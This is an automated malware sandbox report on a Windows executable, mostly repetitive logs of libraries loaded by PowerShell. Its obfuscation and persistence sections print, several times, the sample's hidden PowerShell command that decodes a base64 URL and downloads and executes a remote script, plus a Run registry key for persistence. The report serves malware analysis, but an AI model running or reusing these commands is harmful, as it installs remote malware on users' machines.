Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: 87J30ulb4q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 87J30ulb4q.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 87J30ulb4q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1558187413.00000238D0609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000008.00000002.1307175641.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdby source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdb source: 87J30ulb4q.exe
Source: Binary string: utomation.pdbA source: powershell.exe, 0000000C.00000002.1555560960.00000238D03A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb[ source: powershell.exe, 0000000C.00000002.1555560960.00000238D03E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb! source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/^ source: powershell.exe, 0000000C.00000002.1557064368.00000238D0452000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\ source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb: source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbW source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdbbn|n nn_CorExeMainmscoree.dll source: 87J30ulb4q.exe

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)@{# Script module or binary module file associated with this manifest.ModuleToProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)@{# Script module or binary module file associated with this manifest.ModuleToProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)@{# Script module or binary module file associated with this manifest.ModuleToProcess
Suspicious powershell command line found
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"Jump to behavior
Source: 87J30ulb4q.exeStatic PE information: 0xDF19A82E [Tue Aug 10 18:23:42 2088 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE7CEF00BD pushad ; iretd 9_2_00007FFE7CEF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE7CFC1516 push es; iretd 9_2_00007FFE7CFC1582

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\87J30ulb4q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfagJump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\87J30ulb4q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"Jump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfagJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfagJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
